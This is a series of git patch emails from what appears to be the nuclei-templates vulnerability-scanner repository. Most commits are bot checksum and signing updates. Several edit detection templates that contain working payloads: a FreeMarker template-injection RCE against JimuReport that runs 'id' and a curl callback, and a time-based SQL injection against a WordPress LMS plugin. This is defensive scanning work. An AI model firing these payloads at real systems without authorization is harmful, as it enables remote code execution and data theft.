'http/exposed-panels/gradle/gradle-develocity-panel.yaml' - 'http/exposures/configs/snoop-servlet-exposure.yaml' + - 'http/misconfiguration/servicenow-title-injection.yaml' - 'http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml' - 'http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml' workflow_dispatch: From 69c492fdd1bbf1f64fb31e7e79ac7db499aef64d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 04:48:25 +0000 Subject: [PATCH 154/247] Auto Template Signing [Mon Jul 15 04:48:25 UTC 2024] :robot: --- http/cves/2024/CVE-2024-5217.yaml | 1 + http/misconfiguration/servicenow-title-injection.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2024/CVE-2024-5217.yaml b/http/cves/2024/CVE-2024-5217.yaml index 5f5f3502d67..a82ea1a866f 100644 --- a/http/cves/2024/CVE-2024-5217.yaml +++ b/http/cves/2024/CVE-2024-5217.yaml @@ -46,3 +46,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100bd7021d66da3ea62115899f8a80baafb14308996dd48db662b8f97f06ec9a478022100b2401925d9ebe433c7487e337c23f056a15aa00a9e243fed3206122d7736976e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/servicenow-title-injection.yaml b/http/misconfiguration/servicenow-title-injection.yaml index 12c5ba8f5dd..8c735b8ffd2 100644 --- a/http/misconfiguration/servicenow-title-injection.yaml +++ b/http/misconfiguration/servicenow-title-injection.yaml @@ -42,3 +42,4 @@ http: - type: status status: - 200 +# digest: 490a00463044022028775a2bdbb0790a013e05fdc3901fa59ad612c2ebc01a9f8049fb0b0387d0bc0220539a0a3b9993a72a394cdeb797947af93d8f1c0bb87bf31dead817b6a9d18a8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 63879d0d2fcf96aa55f1dacb180cf498a7f476da Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 05:25:33 +0000 Subject: [PATCH 155/247] Auto Generated New Template Addition List [Mon Jul 15 05:25:33 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ee9a11893a4..151416faea0 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ http/cves/2022/CVE-2022-45269.yaml http/cves/2023/CVE-2023-4220.yaml http/cves/2023/CVE-2023-44012.yaml +http/cves/2023/CVE-2023-48728.yaml http/cves/2024/CVE-2024-2330.yaml http/cves/2024/CVE-2024-3742.yaml http/cves/2024/CVE-2024-4879.yaml From 8311fe2507a7a7e5457e011af4d7969c142cd962 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 05:25:38 +0000 Subject: [PATCH 156/247] Auto Generated Templates Checksum [Mon Jul 15 05:25:38 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6888ca621e2..f29edf975ac 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3323,6 +3323,7 @@ http/cves/2023/CVE-2023-47643.yaml:843ad477f4c0847367fb5b5ea156ebba57372f93 http/cves/2023/CVE-2023-48023.yaml:45c9fed1d64556214b74e1de1852e6a6995bacbe http/cves/2023/CVE-2023-48084.yaml:6714252dc89c27ea7cda0484f6e45f5c21849ca8 http/cves/2023/CVE-2023-48241.yaml:dfc0a5bb442e3fbd259af0a16c5ecedfeb56c758 +http/cves/2023/CVE-2023-48728.yaml:676ba5671734f78ff5a987b5931ea087e49d911d http/cves/2023/CVE-2023-48777.yaml:52b0e3e7eb3ed22f9d0d68114053dd9ea87677d6 http/cves/2023/CVE-2023-49070.yaml:26d50632afda5fb2ae8260a5e386064f3e2d581c http/cves/2023/CVE-2023-49103.yaml:1a61e2197a90af44caca1e85ca6489698e09accc @@ -3495,7 +3496,7 @@ http/cves/2024/CVE-2024-4836.yaml:2dd1cd40b76fc713b718db4852eb9bca8cf67380 http/cves/2024/CVE-2024-4879.yaml:d7145baebf2f66d94413b3508aef384bfe691b3f http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5084.yaml:8ede90fad7058c4a2a7499562f98cacae32ede68 -http/cves/2024/CVE-2024-5217.yaml:fb8c78c0785c6975ce0706b89ff8e911d9e022e6 +http/cves/2024/CVE-2024-5217.yaml:cf2d874cba1069c15371fe16a5ede176ba0bfae7 http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/cves/2024/CVE-2024-5522.yaml:1aae46b20c03316823691aa8755eb8e35b46533a http/cves/2024/CVE-2024-5947.yaml:1007c228fb459bf995a9b759b10c668e190ab1e6 @@ -5917,7 +5918,7 @@ http/misconfiguration/sentinel-license-monitor.yaml:123e83ea787470cc96323f371c0f http/misconfiguration/seq-dashboard-unath.yaml:c8f87c43bbc194440decf9a5a58444279b11fb5d http/misconfiguration/server-status.yaml:0fbfb6c7b6e541aade005e601c0a5d83acdfe202 http/misconfiguration/service-pwd.yaml:625117d7929ae17d0cf02bb5b4e9fefee1ca36b9 -http/misconfiguration/servicenow-title-injection.yaml:8cdd5a1a8081cc7a66789662570f9a1f533d49da +http/misconfiguration/servicenow-title-injection.yaml:6e2f091a40860419e5be19393caf23c1ef608ffa http/misconfiguration/servicenow-widget-misconfig.yaml:7946ba306bf6bdea013874dd95b68cab9c106c7b http/misconfiguration/shell-history.yaml:ef801bc0a0ded3159e0d15422845a35286b269e0 http/misconfiguration/sitecore-debug-page.yaml:2934b7c26a571f8a4c2f13a9bd99059a5c4e974d @@ -8876,7 +8877,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:3b4bbaf1bf19bc120be7a20619a150b65501e272 +templates-checksum.txt:9033ee0493cca80c81acd777356098cbb6dc2beb wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 937444955b1ee1cd773e76cea55cb1021c5edaac Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 05:26:27 +0000 Subject: [PATCH 157/247] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index adbd1e5b097..b7709e0846d 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -6,6 +6,7 @@ on: - 'http/cves/2022/CVE-2022-45269.yaml' - 'http/cves/2023/CVE-2023-4220.yaml' - 'http/cves/2023/CVE-2023-44012.yaml' + - 'http/cves/2023/CVE-2023-48728.yaml' - 'http/cves/2024/CVE-2024-2330.yaml' - 'http/cves/2024/CVE-2024-3742.yaml' - 'http/cves/2024/CVE-2024-4879.yaml' From 65b6744381d7546d9bff156617190ef2842ef8b2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 05:27:21 +0000 Subject: [PATCH 158/247] Auto Template Signing [Mon Jul 15 05:27:21 UTC 2024] :robot: --- http/cves/2023/CVE-2023-48728.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-48728.yaml b/http/cves/2023/CVE-2023-48728.yaml index 46d3b183ad3..fc4b5d8ecd8 100644 --- a/http/cves/2023/CVE-2023-48728.yaml +++ b/http/cves/2023/CVE-2023-48728.yaml @@ -41,3 +41,4 @@ http: - 'status_code == 200 || status_code == 500' - 'contains(header, "text/html")' condition: and +# digest: 4b0a00483046022100b3f243978a7668c139e66d6a06da1195e871eb3b208bd63d318d18a23c4340b8022100bce3df29ca987ce9097f1da4dd2fb477455648ed5ec4068c7958bed3c28de820:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 050bdc5314981b8bc3532f73bcc7a7235981f0d6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 05:27:35 +0000 Subject: [PATCH 159/247] Auto Generated New Template Addition List [Mon Jul 15 05:27:35 UTC 2024] :robot: From 4b7404658c06d5e5406a32479de28ca875183f08 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 05:27:43 +0000 Subject: [PATCH 160/247] Auto Generated Templates Checksum [Mon Jul 15 05:27:43 UTC 2024] :robot: --- templates-checksum.txt | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f29edf975ac..a492baab00c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -974,7 +974,7 @@ http/cnvd/2021/CNVD-2021-09650.yaml:c52190bcf210a731366792c944c5bfe8272296a8 http/cnvd/2021/CNVD-2021-10543.yaml:c1026547067fb7f3dd5601f3f71eec8793222778 http/cnvd/2021/CNVD-2021-14536.yaml:78b9c1a700aedb16c09fb174f3a2b87361e4d757 http/cnvd/2021/CNVD-2021-15822.yaml:2d07bfd7e2578a3cb23bf8d3efb74adf85abd035 -http/cnvd/2021/CNVD-2021-15824.yaml:111185f7d3cb57f2493ddddcbebdeb89edaf17e6 +http/cnvd/2021/CNVD-2021-15824.yaml:f2c942015bfe6963cf4bc852a8ef223241838ddd http/cnvd/2021/CNVD-2021-17369.yaml:c6641a046b08f57aa90ed4aca983da8265404f8c http/cnvd/2021/CNVD-2021-26422.yaml:3e323f0417f5e29dde9543fbb5ecbfe4dbcc6303 http/cnvd/2021/CNVD-2021-28277.yaml:68aff5e8d0140815c4acfff946b3f46f69f184b2 @@ -8020,7 +8020,6 @@ http/vulnerabilities/other/ecsimagingpacs-rce.yaml:225ae97e89c774cfaff636a3f7f71 http/vulnerabilities/other/eibiz-lfi.yaml:cbf9aa62b6d93b0b8cc1ab70dd1fa1b7da422c9e http/vulnerabilities/other/elFinder-path-traversal.yaml:9c9ea74d1312aada35ec1821961113c8e1d37afa http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml:7b2eac74efc5e020858690936c34ea3c3879b3f9 -http/vulnerabilities/other/empirecms-xss.yaml:1dd42b3c178c08112a55a795637916ae0ad19302 http/vulnerabilities/other/ems-sqli.yaml:5041a04bd1dddfaa7461e369509b318dda871c4d http/vulnerabilities/other/enjoyrmis-sqli.yaml:10b4c83409aa50fed78065b26ab34a7c8f6aa631 http/vulnerabilities/other/ep-web-cms-xss.yaml:9b9f26659fe3486aeb093bff5874b1f9900df616 @@ -8877,7 +8876,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9033ee0493cca80c81acd777356098cbb6dc2beb +templates-checksum.txt:eb89861e6e2bd8b435d28f1a536008b717467c11 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ae0044bc797e1efe266984fe407cdf07d33099e0 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 05:28:35 +0000 Subject: [PATCH 161/247] Auto Generated New Template Addition List [Mon Jul 15 05:28:35 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 151416faea0..5fc78c679ed 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ http/cves/2022/CVE-2022-45269.yaml +http/cves/2023/CVE-2023-29204.yaml http/cves/2023/CVE-2023-4220.yaml http/cves/2023/CVE-2023-44012.yaml http/cves/2023/CVE-2023-48728.yaml From ac9e4c8bbe2deaf4b72bca8d58692ae8904749d8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 05:28:42 +0000 Subject: [PATCH 162/247] Auto Generated Templates Checksum [Mon Jul 15 05:28:42 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a492baab00c..43c260e7807 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3115,6 +3115,7 @@ http/cves/2023/CVE-2023-28432.yaml:55e5c982b19f567942ceb8ab4ac57446750405c9 http/cves/2023/CVE-2023-28662.yaml:db8a8150ddf3eeb5658b6a1f890fbda8f0904d59 http/cves/2023/CVE-2023-28665.yaml:c7ea34160278c858993ca4e151493a66c041e685 http/cves/2023/CVE-2023-29084.yaml:7335430074b2cdc90b92637fcf2145c3a2cdbb5a +http/cves/2023/CVE-2023-29204.yaml:c8e21ff3c03734685069d76093b69a2ae414d7a7 http/cves/2023/CVE-2023-29298.yaml:fc59b893b6d31feebb375289accdccc041d75ac9 http/cves/2023/CVE-2023-29300.yaml:92d57be27eb447fc6bd0912c30df002d7407a300 http/cves/2023/CVE-2023-29357.yaml:0ab57ac3d6597a932b316bc1dfdb6dded4854294 @@ -3323,7 +3324,7 @@ http/cves/2023/CVE-2023-47643.yaml:843ad477f4c0847367fb5b5ea156ebba57372f93 http/cves/2023/CVE-2023-48023.yaml:45c9fed1d64556214b74e1de1852e6a6995bacbe http/cves/2023/CVE-2023-48084.yaml:6714252dc89c27ea7cda0484f6e45f5c21849ca8 http/cves/2023/CVE-2023-48241.yaml:dfc0a5bb442e3fbd259af0a16c5ecedfeb56c758 -http/cves/2023/CVE-2023-48728.yaml:676ba5671734f78ff5a987b5931ea087e49d911d +http/cves/2023/CVE-2023-48728.yaml:30a8054088b9835c1b5c380b03420d54424ae4fd http/cves/2023/CVE-2023-48777.yaml:52b0e3e7eb3ed22f9d0d68114053dd9ea87677d6 http/cves/2023/CVE-2023-49070.yaml:26d50632afda5fb2ae8260a5e386064f3e2d581c http/cves/2023/CVE-2023-49103.yaml:1a61e2197a90af44caca1e85ca6489698e09accc @@ -8876,7 +8877,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:eb89861e6e2bd8b435d28f1a536008b717467c11 +templates-checksum.txt:e8c32bfa7093ffc5a2a4b1f2d90e7c99d6de8e47 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From be3a77762c30b753234aed3d494177a066a035c7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 05:29:29 +0000 Subject: [PATCH 163/247] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b7709e0846d..58a67fbf9be 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'http/cves/2022/CVE-2022-45269.yaml' + - 'http/cves/2023/CVE-2023-29204.yaml' - 'http/cves/2023/CVE-2023-4220.yaml' - 'http/cves/2023/CVE-2023-44012.yaml' - 'http/cves/2023/CVE-2023-48728.yaml' From 84805386e81a302791d89c701968b441c07e9a8e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 05:30:29 +0000 Subject: [PATCH 164/247] Auto Template Signing [Mon Jul 15 05:30:29 UTC 2024] :robot: --- http/cnvd/2021/CNVD-2021-15824.yaml | 2 +- http/cves/2023/CVE-2023-29204.yaml | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cnvd/2021/CNVD-2021-15824.yaml b/http/cnvd/2021/CNVD-2021-15824.yaml index 31ef878ebba..6073a0e04d8 100644 --- a/http/cnvd/2021/CNVD-2021-15824.yaml +++ b/http/cnvd/2021/CNVD-2021-15824.yaml @@ -35,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bd99bed51a9176fa2d9b166aa56e5dbf68db6cca10c27260f127129ae6b78ac102201d3585044ed11e562a6aadf90a7c422d2e85de8e1dc023be26456cfa76fbefaf:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206ee0264e332ef668bc46fdd8cdb2496fc0fdfcb71334e500b11d0ed036dfba64022025f4bdb1a75b771cae2b246bd7d9d00ddcbd34ece08cd44b8e3698d89cd0062a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-29204.yaml b/http/cves/2023/CVE-2023-29204.yaml index 42aef997f6e..31623a826ef 100644 --- a/http/cves/2023/CVE-2023-29204.yaml +++ b/http/cves/2023/CVE-2023-29204.yaml @@ -42,3 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4a0a00473045022100a9e6f163f3f39c2b3b46524179d1705705a4934c4208c88d28b483f3b91dd690022040db666a1484eebbadd5cc2370e5b3d165703d7a1c2162ccc48f8d2a9fcda3dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From eee54245edb907f9eda059498d407dc9c2793a73 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 11:17:56 +0530 Subject: [PATCH 165/247] minor update --- http/cves/2024/CVE-2024-1512.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-1512.yaml b/http/cves/2024/CVE-2024-1512.yaml index 63f6a87343b..b5cba29ce8f 100644 --- a/http/cves/2024/CVE-2024-1512.yaml +++ b/http/cves/2024/CVE-2024-1512.yaml @@ -12,7 +12,6 @@ info: - https://github.com/rat-c/CVE-2024-1512 - https://blog.csdn.net/m0_60571842/article/details/139901296 - https://www.wordfence.com/threat-intel/vulnerabilities/id/d6b6d824-51d3-4da9-a39a-b957368df4dc?source=cve - - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 @@ -21,7 +20,7 @@ info: epss-percentile: 0.09257 metadata: verified: true - max-request: 2 + max-request: 1 vendor: stylemixthemes product: masterstudy_lms framework: wordpress @@ -31,7 +30,7 @@ info: http: - raw: - | - @timeout 30s + @timeout 10s GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%286%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1 Host: {{Hostname}} @@ -39,6 +38,7 @@ http: - type: dsl dsl: - 'duration>=6' - - 'contains_all(body,"items","total","total_price") && contains(header,"application/json")' + - 'contains_all(body,"items","total","total_price") + - 'contains(content_type,"application/json")' - 'status_code == 200' condition: and From fbe7d54dd60fbc2424ef2c1c32906c107883dce9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 11:58:41 +0530 Subject: [PATCH 166/247] minor update --- http/cves/2023/CVE-2023-4450.yaml | 77 +++++++++++++++---------------- 1 file changed, 38 insertions(+), 39 deletions(-) diff --git a/http/cves/2023/CVE-2023-4450.yaml b/http/cves/2023/CVE-2023-4450.yaml index 1b4660f61c4..aee11f7071a 100644 --- a/http/cves/2023/CVE-2023-4450.yaml +++ b/http/cves/2023/CVE-2023-4450.yaml @@ -1,57 +1,56 @@ -id: 'CVE-2023-4450' +id: CVE-2023-4450 info: - name: 'JimuReport FreeMarker SSTI RCE (CVE-2023-4450)' - author: 'Sumanth Vankineni' + name: JeecgBoot JimuReport Template injection + author: Sumanth Vankineni severity: critical description: | - A vulnerability was found in jeecgboot JimuReport up to version 1.6.0. It has been declared as critical. Affected by this vulnerability is the Template Handler component. The vulnerability allows for server-side template injection (SSTI), leading to arbitrary code execution. The attack can be launched remotely. This exploit has been disclosed to the public and may be used. Upgrading to version 1.6.1 addresses this issue. It is recommended to upgrade the affected component. - - - NVD CVSS Score: 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) - - VulDB CVSS Score: 6.3 MEDIUM (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L) - - References: - - https://github.com/advisories/GHSA-j8h5-8rrr-m6j9 - - https://whoopsunix.com/docs/java/named%20module/ - - VDB-237571 - tags: jimureport, ssti, rce, freemarker, cve-2023-4450 + A vulnerability was found in jeecgboot JimuReport up to 1.6.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Template Handler. The manipulation leads to injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. + impact: Unauthorized api called /jmreport/queryFieldBySql led to remote arbitrary code execution due to parsing SQL statements using Freemarker. + remediation: Upgrading to version 1.6.1 is able to address this issue. It is recommended to upgrade the affected component. + reference: + - https://github.com/advisories/GHSA-j8h5-8rrr-m6j9 + - https://whoopsunix.com/docs/java/named%20module/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-4450 + metadata: + verified: true + max-request: 1 + vendor: jeecg + product: jeecg + shodan-query: + - title:"Jeecg-Boot" + - http.title:"jeecg-boot" + fofa-query: + - title="JeecgBoot 企业级低代码平台" + - title="jeecg-boot" + - title="jeecgboot 企业级低代码平台" + google-query: intitle:"jeecg-boot" + tags: cve,cve2023,rce,jeecgboot -requests: +http: - method: POST path: - "{{BaseURL}}/jmreport/queryFieldBySql" headers: Content-Type: application/json - User-Agent: Nuclei - body: | - { - "sql": "select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"id\")}'" - } - matchers-condition: and - matchers: - - type: regex - regex: - - "result: uid=[0-9]+\\(.*\\) gid=[0-9]+\\(.*\\) groups=[0-9]+\\(.*\\)" - part: body - - type: status - status: - - 200 - - method: POST - path: - - "{{BaseURL}}/jmreport/queryFieldBySql" - headers: - Content-Type: application/json - User-Agent: Nuclei + body: | { - "sql": "select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"ver\")}'" + "sql": "select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"curl {{interactsh-url}}\")}'" } + matchers-condition: and matchers: - - type: regex - regex: - - "result: .*Windows.*" - part: body + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: header + words: + - "ListManagerWeb" + - type: status status: - 200 From e3ce693b080a1a2ef15ce252b916ba8acecb4b32 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 12:05:16 +0530 Subject: [PATCH 167/247] Update CVE-2023-4450.yaml --- http/cves/2023/CVE-2023-4450.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/http/cves/2023/CVE-2023-4450.yaml b/http/cves/2023/CVE-2023-4450.yaml index aee11f7071a..9b0602f6488 100644 --- a/http/cves/2023/CVE-2023-4450.yaml +++ b/http/cves/2023/CVE-2023-4450.yaml @@ -1,13 +1,15 @@ id: CVE-2023-4450 info: - name: JeecgBoot JimuReport Template injection + name: JeecgBoot JimuReport - Template injection author: Sumanth Vankineni severity: critical description: | - A vulnerability was found in jeecgboot JimuReport up to 1.6.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Template Handler. The manipulation leads to injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. - impact: Unauthorized api called /jmreport/queryFieldBySql led to remote arbitrary code execution due to parsing SQL statements using Freemarker. - remediation: Upgrading to version 1.6.1 is able to address this issue. It is recommended to upgrade the affected component. + A vulnerability was found in jeecgboot JimuReport up to 1.6.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Template Handler. The manipulation leads to injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. + impact: | + Unauthorized api called /jmreport/queryFieldBySql led to remote arbitrary code execution due to parsing SQL statements using Freemarker. + remediation: | + Upgrading to version 1.6.1 is able to address this issue. It is recommended to upgrade the affected component. reference: - https://github.com/advisories/GHSA-j8h5-8rrr-m6j9 - https://whoopsunix.com/docs/java/named%20module/ From 903e3a6dd9d17f6e1b632e3760eb212ec7820257 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 12:14:26 +0530 Subject: [PATCH 168/247] minor update --- http/cves/2023/CVE-2023-4450.yaml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/http/cves/2023/CVE-2023-4450.yaml b/http/cves/2023/CVE-2023-4450.yaml index 9b0602f6488..273bb151a18 100644 --- a/http/cves/2023/CVE-2023-4450.yaml +++ b/http/cves/2023/CVE-2023-4450.yaml @@ -38,20 +38,20 @@ http: body: | { - "sql": "select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"curl {{interactsh-url}}\")}'" + "sql": "select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"id\")}'" } matchers-condition: and matchers: - - type: word - part: interactsh_protocol - words: - - "dns" + - type: regex + part: body + regex: + - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)" - type: word - part: header + part: content_type words: - - "ListManagerWeb" + - "application/json" - type: status status: From bd5fb153af62776cea2778105c0d42c8991bc0eb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 12:41:32 +0530 Subject: [PATCH 169/247] minor update --- http/cves/2023/CVE-2023-4450.yaml | 39 +++++++++++++------------------ 1 file changed, 16 insertions(+), 23 deletions(-) diff --git a/http/cves/2023/CVE-2023-4450.yaml b/http/cves/2023/CVE-2023-4450.yaml index 273bb151a18..bd903ecbb7d 100644 --- a/http/cves/2023/CVE-2023-4450.yaml +++ b/http/cves/2023/CVE-2023-4450.yaml @@ -30,29 +30,22 @@ info: tags: cve,cve2023,rce,jeecgboot http: - - method: POST - path: - - "{{BaseURL}}/jmreport/queryFieldBySql" - headers: - Content-Type: application/json + - raw: + - | + POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json - body: | - { - "sql": "select 'result:<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ex(\"id\")}'" - } + { + "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://{{interactsh-url}}\")} ", + "type": "0" + } - matchers-condition: and matchers: - - type: regex - part: body - regex: - - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)" - - - type: word - part: content_type - words: - - "application/json" - - - type: status - status: - - 200 + - type: dsl + dsl: + - 'contains(interactsh_protocol, "http") || contains(interactsh_protocol, "dns")' + - 'status_code == 200' + - 'contains(content_type,"application/json")' + - 'contains(body,"success")' + condition: and From aad138515449e3cfd1d7220ea1800e499d897b70 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 15 Jul 2024 12:43:11 +0530 Subject: [PATCH 170/247] minor-update --- http/cves/2024/CVE-2024-1512.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-1512.yaml b/http/cves/2024/CVE-2024-1512.yaml index b5cba29ce8f..5be76b06ec1 100644 --- a/http/cves/2024/CVE-2024-1512.yaml +++ b/http/cves/2024/CVE-2024-1512.yaml @@ -38,7 +38,7 @@ http: - type: dsl dsl: - 'duration>=6' - - 'contains_all(body,"items","total","total_price") + - 'contains_all(body,"items","total","total_price")' - 'contains(content_type,"application/json")' - 'status_code == 200' condition: and From d23457d8801a8e3a0ac801ea349d9039e2063bf1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 08:36:08 +0000 Subject: [PATCH 171/247] Auto Generated New Template Addition List [Mon Jul 15 08:36:07 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 5fc78c679ed..dcbd671beaa 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ http/cves/2023/CVE-2023-29204.yaml http/cves/2023/CVE-2023-4220.yaml http/cves/2023/CVE-2023-44012.yaml http/cves/2023/CVE-2023-48728.yaml +http/cves/2024/CVE-2024-1512.yaml http/cves/2024/CVE-2024-2330.yaml http/cves/2024/CVE-2024-3742.yaml http/cves/2024/CVE-2024-4879.yaml From 68ce4ca1bfd494689727192109fa48563d54193a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 08:36:27 +0000 Subject: [PATCH 172/247] Auto Generated Templates Checksum [Mon Jul 15 08:36:27 UTC 2024] :robot: 